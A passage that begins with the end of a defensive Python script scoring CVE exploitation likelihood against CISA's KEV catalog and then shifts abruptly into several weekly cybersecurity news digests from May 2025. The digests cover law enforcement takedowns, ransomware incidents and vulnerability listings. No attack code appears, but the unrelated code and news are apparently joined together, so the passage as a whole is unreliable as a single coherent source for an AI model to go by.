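                            and score_on(histories[c], dn) < low_epss)
    return {
        "lev": scores,
        "expected_exploited": expected_exploited,
        "kev_coverage": coverage,
        "kev_missing_high_lev": missing,
        "epss_underestimates": underestimated,
    }


# Constructed sample data (hypothetical CVE ids, not real vulnerabilities)
D0, DN = date(2025, 1, 1), date(2025, 3, 17)
SAMPLE_HISTORIES = {
    "CVE-0000-0001": [(date(2025, 1, 1), 0.4)],   # steady, moderate EPSS
    "CVE-0000-0002": [(date(2025, 1, 1), 0.02)],  # steady, low EPSS
    # spiked early, then EPSS decayed after exploitation was observed
    "CVE-0000-0003": [(date(2025, 1, 1), 0.9), (date(2025, 1, 20), 0.05)],
}
SAMPLE_KEV = {"CVE-0000-0003"}

if __name__ == "__main__":
    report = kev_gap_report(SAMPLE_HISTORIES, SAMPLE_KEV, D0, DN)
    for cve, s in report["lev"].items():
        print(f"{cve}: LEV={s:.3f}")
    print("expected exploited:", round(report["expected_exploited"], 3))
    print("KEV coverage:", round(report["kev_coverage"], 3))
    print("high-LEV CVEs missing from KEV:", report["kev_missing_high_lev"])
    print("EPSS underestimates:", report["epss_underestimates"])
```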
  • Next Thursday, the Senate Homeland Security and Governmental Affairs Committee will hold a confirmation hearing for the following Department of Homeland Security nominees.
    • Sean Cairncross, of Minnesota, to be National Cyber Director, Robert Law, of the District of Columbia, to be Under Secretary for Strategy, Policy, and Plans, James Percival, of Florida, to be General Counsel, Sean Plankey, of Pennsylvania, to be Director of the Cybersecurity and Infrastructure Security Agency, and Kevin Rhodes, of Florida, to be Administrator for Federal Procurement Policy.
  • Federal News Network reports yesterday,
    • “The Trump administration is proposing to cut more than 1,000 positions at the Cybersecurity and Infrastructure Security Agency.
    • “Under the 2026 budget request, CISA would go from approximately 3,732 funded positions today to 2,649 positions next year. The staff reductions are detailed in CISA’s fiscal 2026 budget justification, posted today. They present the most detailed view yet of the Trump administration’s proposal to cut CISA’s budget by nearly $500 million.
    • “The proposed cuts still have to be approved by Congress as part of the 2026 appropriations process. But they come as hundreds of CISA employees have already left under the Trump administration. Meanwhile, more staff could depart through deferred resignations or early retirements offered to DHS staff in April.
    • “The proposed cuts are spread across CISA’s various divisions. CISA’s cybersecurity division would go from 1,267 positions to 1,063 jobs. CISA’s infrastructure security division would go from about 343 positions to 325 jobs.”
  • Dark Reading informs us,
    • “The Cybersecurity and Infrastructure Security Agency (CISA) and Australian Cyber Security Centre (ACSC) released new guidance this week on procuring, implementing, and maintaining security information and event management (SIEM) and security orchestration, automation, and response (SOAR) platforms.
    • “SIEM and SOAR help organizations collect and analyze data from firewalls, endpoints, and applications to better detect and respond to cybersecurity incidents. However, many organizations encounter significant implementation and deployment challenges, including significant costs and ongoing maintenance requirements. The guidance noted these are not “set it and forget it” tools.
    • “These platforms are becoming more essential as organizations store and manage an influx of data that is highly attractive to attackers, particularly personally identifiable information and personal health information. Additionally, increasing infrastructure complexity is creating gaps in visibility and making threat detection more difficult. There are more endpoints to secure, more applications, more third-party vendors, and more remote workers for attackers to exploit.”  
  • Per HHS Office for Civil Rights news releases,
  • and
    • “Today [May 30, 2025], the U.S. Department of Health and Human Services (“HHS”), Office for Civil Rights (“OCR”) announced a settlement with Comstar, LLC (“Comstar”), a Massachusetts company that provides billing, collection, and related services to non-profit and municipal emergency ambulance services, concerning potential violations of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Security Rule. The settlement resolves an OCR investigation concerning a ransomware breach that affected 585,621 individuals.”
    • “Under the terms of the settlement, Comstar agreed to implement a corrective action plan that OCR will monitor for two years, and paid OCR $75,000.”
    • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/hipaa/for-professionals/compliance-enforcement/agreements/hhs-hipaa-agreement-comstar/index.html.”
  • Cybersecurity Dive points out,
    • “U.S. authorities on Thursday [May 28, 2025] charged 16 defendants in a massive global operation to disrupt the Russia-based cybercrime group behind the DanaBot malware. 
    • “DanaBot infected more than 300,000 computers around the world, facilitating fraud and ransomware and resulting in more than $50 million in damage, according to federal prosecutors. The U.S. coordinated with multiple foreign governments and private cybersecurity firms to dismantle the botnet operators’ infrastructure.
    • “The Department of Justice charged Aleksandr Stepanov, 39, a.k.a. “JimmBee,” with conspiracy, conspiracy to commit wire and bank fraud and additional charges. Artem Aleksandrovich Kalinkin, 34, a.k.a. “Onix,” was charged with conspiracy to gain unauthorized access to a computer to gain information and to defraud, among additional charges. 
  • Bleeping Computer lets us know,
    • The Federal Criminal Police Office of Germany (Bundeskriminalamt or BKA) claims that Stern, the leader of the Trickbot and Conti cybercrime gangs, is a 36-year-old Russian named Vitaly Nikolaevich Kovalev.
    • “The subject is suspected of having been the founder of the ‘Trickbot’ group, also known as ‘Wizard Spider,’” BKA said last week [English PDF], after another round of seizures and charges as part of Operation Endgame, a joint global law enforcement action targeting malware infrastructure and the threat actors behind it.
    • “The group used the Trickbot malware as well as other malware variants such as Bazarloader, SystemBC, IcedID, Ryuk, Conti and Diavol.
    • “Kovalev is now also wanted in Germany, according to a recently issued Interpol red notice saying he was charged with being the ringleader of an unnamed criminal organization.”
  • and
    • “An international law enforcement operation has taken down AVCheck, a service used by cybercriminals to test whether their malware is detected by commercial antivirus software before deploying it in the wild.
    • “The service’s official domain at avcheck.net now displays a seizure banner with the crests of the U.S. Department of Justice, the FBI, the U.S. Secret Service, and the Dutch police (Politie).
    • “According to an announcement on the Politie website, AVCheck was one of the largest counter antivirus (CAV) services internationally, which helped cybercriminals assess the stealthiness and evasion of their malware.
    • “Taking the AVCheck service offline marks an important step in tackling organized cybercrime,” stated Politie’s Matthijs Jaspers.
    • “With this [action], we disrupt cybercriminals as early as possible in their operations and prevent victims.”
  • USA Today reports,
    • “An Iranian national pleaded guilty for his role in an international ransomware scheme that targeted the computer networks of Baltimore and other U.S. cities, disrupting services and causing tens of millions of dollars in losses, federal authorities said.
    • “Sina Gholinejad, 37, pleaded guilty May 27 to one count of computer fraud and abuse and one count of conspiracy to commit wire fraud, the Justice Department said in a news release. Gholinejad was arrested Jan. 10 at Raleigh-Durham International Airport in North Carolina, federal court records show.
    • “He faces a maximum penalty of 30 years in prison and is set to be sentenced in August, the Justice Department announced.”

From the cybersecurity vulnerabilities and breaches front,

  • Cybersecurity Dive informs us,
    • “A previously unknown team of Russian government-backed hackers is targeting critical infrastructure organizations in multiple sectors to collect intelligence for Moscow, Microsoft and the Dutch government said in separate reports published Tuesday.
    • “The group, which Microsoft calls Void Blizzard and the Dutch intelligence services call Laundry Bear, has been using stolen credentials and automated bulk-email collection from cloud services to scoop up data on NATO member states and Ukraine.
    • “Void Blizzard’s cyberespionage operations tend to be highly targeted at specific organizations of interest to the Russian government, including in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors primarily in Europe and North America,” Microsoft said in a blog post.”
  • and
    • “A “highly targeted” spearphishing campaign is attempting to ensnare financial executives at banks, investment firms, energy utilities and insurance companies around the world, Trellix said in a report published Wednesday.
    • “The malicious emails are rigged with installers that allow the hackers to remotely access victim computers.
    • “With this amount of access to legitimate accounts, attackers could steal files or initiate fraudulent money transfers, potentially without raising red flags.”
  • and
    • “ConnectWise is investigating suspicious activity — likely associated with a nation-state actor — affecting a limited number of customers that use ScreenConnect. 
    • “In a post on its website, ConnectWise said it has notified all affected customers, alerted law enforcement to the attack and retained Mandiant to help with its investigation. 
    • “A company spokesperson added that ConnectWise issued a patch for ScreenConnect, implemented enhanced monitoring and hardening measures across its environment.” 
  • and
    • “More than 9,000 ASUS routers have been compromised in a months-long hacking campaign that researchers from GreyNoise warn may be a prelude to the creation of a botnet.
    • “Hackers are breaching routers through brute-force login attempts and authentication bypasses that rely on a command injection vulnerability, tracked as CVE-2023-39780, to execute system commands, GreyNoise researchers said in a blog post on Wednesday.
    • “GreyNoise first detected suspicious activity in March, when it flagged three suspicious HTTP POST requests made to ASUS routers, according to Matthew Remacle, senior researcher at GreyNoise.
    • “ASUS released a patch for the vulnerability in a recent firmware update, but the initial bypass attempts have not received CVEs, according to GreyNoise. In addition, researchers say, if a router was compromised before the firmware was updated, a backdoor will still remain on the devices unless secure shell protocol access is explicitly disabled.” 
  • Per Cyberscoop,
    • “As the internet fills up with clips from AI-video generators, hacking groups are seeding the online landscape with malware-laced programs and fake websites hoping to cash in on the trend.
    • “Tracked by researchers at Mandiant and Google Cloud, the campaign is being carried out by a group identified as “UNC6032.” Since mid-2024, they have spread thousands of advertisements, fake websites and social media posts promising victims access to popular prompt-to-video AI generation tools like Luma AI, Canva Dream Lab and Kling AI.
    • “Those promises lead to phishing pages and malware, with the group deploying infostealers and backdoors on victim devices. Compromised parties saw their login credentials, cookies, credit card data and in some cases Facebook information stolen, and the scheme appears to be impacting a wide range of industries and geographic areas.”
  • CISA did not add any known exploited vulnerabilities to its catalog this week.

From the ransomware front,

  • Dark Reading tells us,
    • “Extortionist-cum-information broker “Everest Group” has pulled off a swath of attacks against large organizations in the Middle East, Africa, Europe, and North America, and is now extorting victims over records stolen from their human resources departments.
    • “This May, the long-overlooked threat actor advertised nine new cyberattacks. Victims ranged from healthcare organizations to construction and facilities management companies. But its biggest win came against Coca-Cola, from which it stole records associated with hundreds of employees, including their personally identifying information (PII) like names and addresses, salary records, and scans of passports and visas.
    • “In each of these leaks, researchers from VenariX found files relating to SAP SuccessFactors, SAP’s cloud-based HR management platform. The researchers believe the attacks to be legitimate and estimate that initial access in each case likely occurred through a third-party SAP service provider called “INK IT Solutions.”
  • The Hacker News notes,
    • “The threat actors behind the DragonForce ransomware gained access to an unnamed Managed Service Provider’s (MSP) SimpleHelp remote monitoring and management (RMM) tool and then leveraged it to exfiltrate data and drop the locker on multiple endpoints.
    • “It’s believed that the attackers exploited a trio of security flaws in SimpleHelp (CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726) that were disclosed in January 2025 to access the MSP’s SimpleHelp deployment, according to an analysis from Sophos.
    • “The cybersecurity company said it was alerted to the incident following a suspicious installation of a SimpleHelp installer file, pushed via a legitimate SimpleHelp RMM instance that’s hosted and operated by the MSP for their customers.”
    • The threat actors have also been found to leverage their access through the MSP’s RMM instance to collect information from different customer environments about device names and configuration, users, and network connections.
  • Fortra tells us what we need to know about Interlock ransomware.
  • Per Bleeping Computer,
    • “Threat actors linked to lesser-known ransomware and malware projects now use AI tools as lures to infect unsuspecting victims with malicious payloads.
    • “This development follows a trend that has been growing since last year, starting with advanced threat actors using deepfake content generators to infect victims with malware.
    • “These lures have become widely adopted by info-stealer malware operators and ransomware operations attempting to breach corporate networks.
    • “Cisco Talos researchers have discovered that the same technique is now followed by smaller ransomware teams known as CyberLock, Lucky_Gh0$t, and a new malware named Numero.
    • “The malicious payloads are promoted via SEO poisoning and malvertising to rank them high in search engine results for specific terms.”
  • Per CFO Dive,
    • “About one in four companies targeted in a ransomware incident in the last year did not get all their data back after paying the attacker, cybersecurity firm Delinea said in a report released Wednesday.
    • “Delinea also found that most ransomware today includes data-theft extortion, with 85% of victims saying they were threatened with having their data published or sold.
    • “Paying the ransom doesn’t always bring the desired results,” Delinea said in the report.”

From the cybersecurity business and defenses front,

  • Dark Reading notes,
    • Tenable Security has announced plans to acquire Apex, an Israel-based startup specializing in security solutions driven by artificial intelligence (AI). Apex will be integrated into Tenable One, Tenable’s software-as-a-service-based exposure management platform.
    • “Founded in 2023, Apex helps organizations discover ungoverned AI. Co-founders Matan Derman (CEO) and Tomer Avni (chief product officer) developed a platform designed to surface all AI activities, including shadow apps, AI-generated code, and fake identities. The boutique company of roughly 20 employees competes with Prompt Security, Lasso Security, and Aim Security.”
  • Per Cyberscoop,
    • Zscaler announced Tuesday its intention to acquire Red Canary, a company known for Managed Detection and Response (MDR) services, to boost its ability to integrate artificial intelligence, automation and human expertise into its security offerings. 
    • “The acquisition is positioned around the convergence of Zscaler’s data-driven, AI-centric cloud security and Red Canary’s decade of operational expertise in MDR. Zscaler’s executive leadership emphasizes the blending of large-scale data intelligence and automated, agentic Security Operations Centers (SOCs) with the capabilities of ThreatLabz, its security research division.
    • “The proposed acquisition of Red Canary is a natural expansion of our capabilities into managed detection and response and threat intelligence to accelerate our vision of AI-powered SOC of the future,” Jay Chaudhry, CEO and founder of Zscaler, said in a press release. “By integrating Red Canary with Zscaler, we will deliver to our customers the power of a fully integrated Zero Trust platform and AI-powered security operations.”
  • Dark Reading lets us know,
    • “Chief information security officers (CISOs) are being paid better than ever, more likely to be an executive — or report directly to an executive — and have expanding responsibilities. Yet tight security budgets continue to be a major challenge.
    • “Overall, the top cybersecurity professional is doing well at large companies and has proven their value but continually has to work to link security to business opportunities rather than costs, according to two surveys published this week.
    • “The average CISO at large US companies — those with revenue of $1 billion or more — has a current compensation of $532,000, including base salary, bonuses, and equity benefits, according to survey data published by cybersecurity consultancy IANS Research on May 29. Increasing responsibilities come with the high salaries, with CISOs now often charged with assessing business risk, product security, and digital strategy.
  • Dark Reading explains “A Defense-in-Depth Approach for the Modern Era. By integrating intelligent network policies, zero-trust principles, and AI-driven insights, enterprises can create a robust defense against the next generation of cyber threats.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • Cyberscoop tells us,
    • “A bipartisan Senate duo is reintroducing legislation Thursday that would establish an executive branch panel to align conflicting cybersecurity regulations on the private sector.
    • “Michigan Sen. Gary Peters, the top Democrat on the Homeland Security and Governmental Affairs Committee, is bringing back the Streamlining Federal Cybersecurity Regulations Act with co-sponsor James Lankford, R-Okla.
    • “By reducing the number of duplicative or burdensome reporting requirements, we can give businesses the tools to better secure our critical infrastructure against the serious threat of cyberattacks,” Peters said about the reintroduction of the bill, which CyberScoop is first reporting. “This legislation ensures federal agencies can work collaboratively to create effective cybersecurity standards, enabling businesses to focus on safeguarding their systems rather than navigating a maze of conflicting requirements.”
  • and
    • “A bipartisan pair of senators is taking another shot at legislation that would require federal government contractors to follow National Institute of Standards and Technology guidelines on vulnerability disclosure policies.
    • “The Federal Contractor Cybersecurity Vulnerability Reduction Act from Sens. Mark Warner, D-Va., and James Lankford, R-Okla., advanced out of the chamber’s Homeland Security and Governmental Affairs Committee last November but never got a full floor vote.
    • “The companion bill from Reps. Nancy Mace, R-S.C., and Shontel Brown, D-Ohio, meanwhile, was reintroduced in January and passed the House in March.
    • “The re-do from Warner and Lankford would make sure government contractors have the same legal obligations that federal agencies do in abiding by NIST’s recommendations on vulnerability disclosure policies. With VDPs, organizations can receive unsolicited reports on software vulnerabilities and patch them before an attack occurs.” 
  • Per a Cybersecurity and Infrastructure Security Agency news release,
    • The Cybersecurity and Infrastructure Security Agency (CISA) is proud to announce the appointment of Madhu Gottumukkala as its new Deputy Director. In this role, he will help lead CISA’s mission to understand, manage, and reduce risk to the cyber and physical infrastructure that the American people rely on every day. 
    • Prior to his appointment as the CISA Deputy Director, Dr. Gottumukkala served as Commissioner and Chief Information Officer for South Dakota’s Bureau of Information and Technology, overseeing statewide technology and cybersecurity initiatives. He assumed this role after serving as South Dakota’s second-ever chief technology officer, focused on innovation through the adoption of emerging technologies, while increasing efficiency by replacing outdated legacy systems.
    • “I am honored to be appointed by Secretary Noem to serve as Deputy Director of CISA. As a former state and local leader, I have seen firsthand the exceptional work CISA does in advancing our nation’s cybersecurity and infrastructure resilience,” said Gottumukkala. “I look forward to building on that foundation by fostering collaboration and strengthening resilience across all levels of government and the private sector. Together, through trusted partnerships, transparency, and shared responsibility, we can better manage systemic risks and safeguard the critical functions that ensure our nation’s safety and prosperity.”
  • Cybersecurity Dive reports,
    • “Microsoft’s Digital Crimes Unit (DCU) on Wednesday [May 21] announced an international operation to disrupt Lumma Stealer, a variant of infostealing malware that is popular with criminal gangs and other threat actors worldwide. 
    • “Hackers have used Lumma to steal passwords, credit cards, bank account information and cryptocurrency wallets in major attack campaigns in recent years, Steven Masada, assistant general counsel at Microsoft’s DCU, said in a blog post.
    • “Between March 16 and May 16, Microsoft identified more than 394,000 Windows computers infected with Lumma. After obtaining a court order from the U.S. District Court for the Northern District of Georgia, Microsoft seized 2,300 domains that formed the backbone of Lumma’s infrastructure. The U.S. Department of Justice also seized Lumma’s central command structure and disrupted online marketplaces that sold Lumma.”
  • Here is a link to a related CISA advisory.

From the cybersecurity vulnerabilities and breaches front,

  • CISA added seven known exploited vulnerabilities to its catalog this week.
    • May 19, 2025
      • CVE-2025-4427 Ivanti Endpoint Manager Mobile (EPMM) Authentication Bypass Vulnerability
      • CVE-2025-4428 Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
      • CVE-2024-11182 MDaemon Email Server Cross-Site Scripting (XSS) Vulnerability
      • CVE-2025-27920 Srimax Output Messenger Directory Traversal Vulnerability
      • CVE-2024-27443 Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
      • CVE-2023-38950 ZKTeco BioTime Path Traversal Vulnerability
        • Ivanti discusses its KVEs here.
        • Cyber Press discusses the MDaemon KVE here.
        • TechTarget discusses the Srimax KVE here.
        • Syscan discusses the Synacor KVE here.
    • May 22, 2025
      • CVE-2025-4632 Samsung MagicINFO 9 Server Path Traversal Vulnerability
        • The Hacker News discusses this KVE here.
  • On May 21, CISA released a joint cybersecurity advisory which
    • highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies. This includes those involved in the coordination, transport, and delivery of foreign assistance to Ukraine. Since 2022, Western logistics entities and IT companies have faced an elevated risk of targeting by the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (85th GTsSS), military unit 26165—tracked in the cybersecurity community under several names (see “Cybersecurity Industry Tracking”). The actors’ cyber espionage-oriented campaign, targeting technology companies and logistics entities, uses a mix of previously disclosed tactics, techniques, and procedures (TTPs). The authoring agencies expect similar targeting and TTP use to continue.
  • On May 22, CISA released an “Advisory Update on Cyber Threat Activity Targeting Commvault’s SaaS Cloud Application (Metallic).”
  • Security Week relates “The developers of OpenPGP.js have released updates to patch a critical vulnerability that can be exploited to spoof message signature verification.”
    • OpenPGP.js is an open-source JavaScript implementation of the OpenPGP email encryption library, enabling its use on any device. According to its developers, “The idea is to implement all the needed OpenPGP functionality in a JavaScript library that can be reused in other projects that provide browser extensions or server applications.”
    • “Its website shows that OpenPGP.js is used by projects such as FlowCrypt, Mymail-Crypt, UDC, Encrypt.to, PGP Anywhere, and Passbolt.”
  • Dark Reading points out “3 Severe Bugs Patched in Versa’s Concerto Orchestrator. Three zero-days could have allowed an attacker to completely compromise the Concerto application and the host system running it.”
  • Per SC Media,
    • “Stolen credentials were the root cause of more than 30% of data breaches last year, according to Verizon’s 2025 Data Breach Investigations Report. Attackers compromised more than 23 million unmanaged and user-controlled devices—including personal laptops and home systems used in remote work settings—to extract login information, often using session cookies to bypass multi-factor authentication and other access controls.
    • “Credentials don’t just manifest—you’re either phishing them, brute forcing them, or stealing them via malware,” said Philippe Langlois, lead data scientist at Verizon and co-author of the 2025 DBIR, speaking at last month’s RSAC 2025.
    • “Those numbers aren’t outliers—they’re symptoms of a deeper failure in enterprise cybersecurity. Identity systems, Langlois noted at RSAC 2025, are now routinely exploited as entry points with attackers relying less on technical exploits—like finding and exploiting software vulnerabilities—and more on credential-based access, where they simply log in using stolen usernames, passwords, or hijacked sessions.”

From the ransomware front,

  • Cybersecurity Dive lets us know,
    • “Kettering Health is facing a cyberattack that’s impacting patient care, the Ohio-based health system said on Tuesday [May 20].
    • “The provider was hit by a system-wide technology outage Tuesday morning due to unauthorized access to its network, Kettering said in a press release. 
    • “Elective inpatient and outpatient procedures at the health system’s facilities were canceled Tuesday. Kettering’s call center was also knocked offline and might have been occasionally inaccessible, the provider added.”
  • Security Week informs us,
    • “In a data breach notice published on its website, Marlboro-Chesterfield Pathology said it discovered unauthorized activity on some internal IT systems on January 16, 2025. An investigation revealed that the hackers had stolen some files.
    • “The compromised data includes personal information such as name, address, date of birth, medical treatment information, and health insurance information. The stolen information varies by individual. 
    • “MCP informed the US Department of Health and Human Services (HHS) this week that the incident impacted 235,911 individuals.”
  • Per Bleeping Computer,
    • “The FBI warned that an extortion gang known as the Silent Ransom Group has been targeting U.S. law firms over the last two years in callback phishing and social engineering attacks.
    • “Also known as Luna Moth, Chatty Spider, and UNC3753, this threat group has been active since 2022 and was also behind BazarCall campaigns that provided initial access to corporate networks for Ryuk and Conti ransomware attacks.
    • “In March 2022, following Conti’s shutdown, the threat actors separated from the cybercrime syndicate and formed their own operation called Silent Ransom Group (SRG).
    • “In recent attacks, SRG impersonates the targets’ IT support in email, fake sites, and phone calls using social engineering tactics to gain access to the targets’ networks.
    • “This extortion group doesn’t encrypt the victims’ systems and is known for demanding ransoms not to leak sensitive information stolen from compromised devices online.”
  • Per Dark Reading,
    • “Yet another threat group has embraced the trend of combining email bombing with vishing to gain initial access to systems and deploy ransomware.
    • “This time the adversary employing the technique, first documented as a tactic of Black Basta ransomware group, is the recently emerged 3AM ransomware group, researchers at Sophos revealed in a recent blog post. Sophos spotted an attack in the first quarter this year by 3AM affiliates, which followed the familiar playbook and successfully stole data from the targeted system but did not complete the ransomware attack.”
  • Per Fortra’s Tripwire,
    • “Health-ISAC recently released their 2025 Health Sector Cyber Threat Landscape Report, a comprehensive outline of the malicious activity aimed at healthcare in the previous year. Not surprisingly, ransomware was cited by security professionals in the industry as the number one threat of 2024 and the top area of concern coming into 2025 (followed by third-party breaches, supply chain attacks, and zero-day exploits). Some things never change.
    • “However, when it comes to ransomware, they do evolve. Take a look at [the Tripwire article] some of the reasons ransomware maintains its top spot as the primary plague of healthcare organizations as we move into another threat-filled year.”

From the cybersecurity business and defenses front,

  • Cybersecurity Dive reports,
    • “Shares of Palo Alto Networks fell Wednesday after the company reported better-than-expected earnings in the third fiscal quarter but disappointed some investors over its margins. 
    • “The company reported non-GAAP (generally accepted accounting principles) net income of 80 cents a share during the quarter that ended on April 30, up from 66 cents in the same quarter last year. Those earnings beat consensus estimates of 77 cents. 
    • “Revenue grew 15%, to $2.3 billion, in the quarter, compared with $2 billion in the same period last year.”
  • and
    • Companies designing AI systems should protect training data from tampering and strictly limit access to its underlying infrastructure, the U.S. and three allies said in a joint guidance document published on Thursday [May 22].
    • The AI security guidance addresses multiple topics, including protecting data throughout the AI systems’ life cycle, supply chain considerations and ways to mitigate possible attacks on large data sets.
    • The multilateral warning reflects concerns in the U.S. and allied nations about powerful AI models containing vulnerabilities that can ripple across critical infrastructure.
  • NIST discusses “Cybersecurity and AI: Integrating and Building on Existing NIST Guidelines.”
  • The Wall Street Journal explains “How to lock down your finances and online accounts after a data breach spreads your information to the secret corners of the internet.”
  • Here’s a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • Cybersecurity Dive reports,
    • “Congress moved one step closer to reauthorizing a key cyber threat information-sharing law on Thursday during a hearing that highlighted both the act’s value and potential shortcomings.
    • The House Homeland Security Committee’s cyber subcommittee held the hearing [on May 15] to evaluate the private sector’s satisfaction with the 2015 Cybersecurity Information Sharing Act, which expires on Sept. 30. Witnesses from the tech industry praised the law for encouraging companies to share cyber threat indicators with each other and with federal agencies, but they also offered lawmakers suggestions for how to improve the program.”
  • Defensescoop tells us,
    • “The Department of Defense has expanded its number of cyber teams by 12, with two more slated to come online in the next few years, according to a spokesperson.
    • “The cyber mission force began building in 2012, and the initial 133 teams reached full operational capability in 2018. In DOD’s fiscal 2022 budget request, U.S. Cyber Command proposed and was eventually approved for a phased approach to add 14 additional cyber mission force teams beyond the original 133. That request and authorization in 2021 was the first substantial effort to grow that force since it was designed almost a decade ago, long before modern and advanced threats had surfaced.
    • “In 2021, the Secretary of Defense directed the creation of 14 New cyber teams by September 2028. Of the 14 teams, 12 have been established. These teams are spread across Army, Air Force, and Navy Commands,” a Cybercom spokesperson said.
    • “They declined to offer specifics regarding how many additional teams each service received or what types of teams those additional builds provided to each service — such as offensive, defensive or support teams — citing operational security.”
  • Per a May 15 HHS press release,
    • “Today, the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with Vision Upright MRI, a small California health care provider that conducts magnetic resonance imaging and related services, concerning potential violations of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Breach Notification and Security Rules. The settlement resolves an OCR investigation concerning the breach of an unsecured server containing the medical images of 21,778 individuals.” * * *
    • “Under the terms of the resolution agreement, Vision Upright MRI agreed to implement a corrective action plan that will be monitored by OCR for two years and paid $5,000 to OCR.” 
    • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/hipaa/for-professionals/compliance-enforcement/agreements/hhs-ocr-hipaa-racap-vum/index.html
  • Cyberscoop informs us,
    • “Federal authorities seized two domains and indicted four foreign individuals for alleged involvement in a long-running botnet service that infected older wireless internet routers, the Justice Department said Friday. 
    • “The malware created for the botnet allowed infected routers to be reconfigured, which granted unauthorized access to third parties and made the routers available for sale as proxy servers on Anyproxy.net and 5socks.net, according to law enforcement officials. Both domains, which were managed by a company headquartered in Virginia and hosted on servers worldwide, now render seizure notices under an effort the DOJ and FBI dubbed “Operation Moonlander.”
    • “The 5socks.net website claimed to be in operation for over 20 years and had more than 7,000 proxies for sale worldwide for a monthly subscription of $9.95 to $110 per month, according to prosecutors. The botnet’s overseas operations were also seized and disabled by law enforcement agencies in the Netherlands and Thailand.
    • “Authorities also indicted the botnet’s alleged administrators and charged them with conspiracy and damage to protected computers, for conspiring with others to maintain, operate and profit from the bot.”
  • and
    • Liridon Masurica, the alleged lead administrator of cybercrime marketplace BlackDB.cc, was extradited to the United States on Friday and faces charges that carry a maximum penalty of 55 years in federal prison, the Justice Department said Tuesday. 
    • Masurica, 33, who is also known as “@blackdb,” was arrested by authorities in Kosovo on Dec. 12. He made his initial appearance in federal court in Tampa, Fla., on Tuesday and was ordered detained pending a trial. 
    • Federal prosecutors charged Masurica with one count of conspiracy to commit access device fraud and five counts of fraudulent use of 15 or more unauthorized access devices.
    • Masurica, of Gjilan, Kosovo, is accused of running BlackDB.cc since 2018. The cybercriminal marketplace offered to sell compromised account and server credentials, credit card information and other personally identifiable information of individuals mostly located in the United States, the DOJ said.

From the cybersecurity breaches and vulnerabilities front,

  • Cyberscoop reports,
    • “Hundreds of victims are surfacing across the world from zero-day cyberattacks on Europe’s biggest software manufacturer and company, in a campaign that one leading cyber expert is comparing to the vast Chinese government-linked Salt Typhoon and Volt Typhoon breaches of critical infrastructure.
    • “The zero-days — vulnerabilities previously unknown to researchers or companies, but that malicious hackers have discovered — got patches this month and last month, but there are signs it could be getting worse before it gets better, according to Dave DeWalt, CEO of NightDragon, a venture capital and advisory firm. Ransomware gangs are now reported to be exploiting it, beyond the original Chinese government-connected attackers.
    • “The net of it is this is like the Typhoon size, so much like we saw [with] Volt Typhoon and then Salt Typhoon,” DeWalt told CyberScoop. “Once these exploits get into the wild, it’s a race to see who can get more access to it. So initially it looks like three Chinese actors all used it, and now we’re going to see more.”
    • “A number of companies have been tracking the vulnerability and its consequences, including one, Onapsis, that DeWalt’s company invests in, along with EclecticIQ, ReliaQuest and Google’s Mandiant.”
  • and
    • “Over the past few years, cybersecurity experts have increasingly said that nation-state operatives and cybercriminals often blur the boundaries between geopolitical and financial motivations. A new report released Wednesday shows how North Korea has flipped that idea on its head. 
    • “North Korea has silently forged a global cyber operation that experts now liken to a mafia syndicate, with tactics and organization far removed from other nation-state actors, according to a comprehensive new report released by DTEX Systems.
    • “The study — based on years of investigations, technical analysis, and work with other open-source intelligence analysts — pulls back the curtain on a highly adaptive regime that has built its cyber capabilities on a survivalist, profit-driven approach. It reveals a hierarchy blending criminality, espionage, and front-line IT work, coordinated by an authoritarian government that rewards loyalty and secrecy while punishing failure.” * * *
    • “You can read the full report on DTEX’s website.”
  • Cybersecurity Dive relates,
    • “The FBI is warning about a threat campaign in which malicious actors are impersonating senior U.S. officials using malicious text messages and AI-generated voice messages.
    • “The messages have been sent to current and former federal and state officials and others who may be contacts of those individuals, the bureau said in an alert released Thursday.
    • “The messages are designed to establish a rapport with individuals who might then turn over access to a personal account, according to the alert. These social engineering techniques could be used to reach additional contacts and gain access to additional information or funds.”
  • Bleeping Computer lets us know,
    • “A new tool called ‘Defendnot’ can disable Microsoft Defender on Windows devices by registering a fake antivirus product, even when no real AV is installed.
    • “The trick utilizes an undocumented Windows Security Center (WSC) API that antivirus software uses to tell Windows it is installed and is now managing the real-time protection for the device.
    • “When an antivirus program is registered, Windows automatically disables Microsoft Defender to avoid conflicts from running multiple security applications on the same device.
    • “The Defendnot tool, created by researcher es3n1n, abuses this API by registering a fake antivirus product that meets all of Windows’ validation checks. * * *
    • “While Defendnot is considered a research project, the tool demonstrates how trusted system features can be manipulated to turn off security features.
    • “Microsoft Defender is currently detecting and quarantining Defendnot as a ‘Win32/Sabsik.FL.!ml’ detection.”
  • The Cybersecurity and Infrastructure Security Agency (CISA) added nine known exploited vulnerabilities to its catalog this week.
  • May 13, 2025
    • CVE-2025-30400 Microsoft Windows DWM Core Library Use-After-Free Vulnerability
    • CVE-2025-32701 Microsoft Windows Common Log File System (CLFS) Driver Use-After-Free Vulnerability
    • CVE-2025-32706 Microsoft Windows Common Log File System (CLFS) Driver Heap-Based Buffer Overflow Vulnerability
    • CVE-2025-30397 Microsoft Windows Scripting Engine Type Confusion Vulnerability
    • CVE-2025-32709 Microsoft Windows Ancillary Function Driver for WinSock Use-After-Free Vulnerability
      • CrowdStrike discusses these KEVs here.
      • Cyberscoop discusses Microsoft’s May 13 Patch Tuesday here.
      • See also Bleeping Computer article titled “Microsoft confirms May Windows 10 updates trigger BitLocker recovery”
  • May 14, 2025
    • CVE-2025-32756 Fortinet Multiple Products Stack-Based Buffer Overflow Vulnerability
      • Rapid7 discusses this KEV here.
  • May 15, 2025
    • CVE-2024-12987 DrayTek Vigor Routers OS Command Injection Vulnerability
      • This KEV is discussed here.
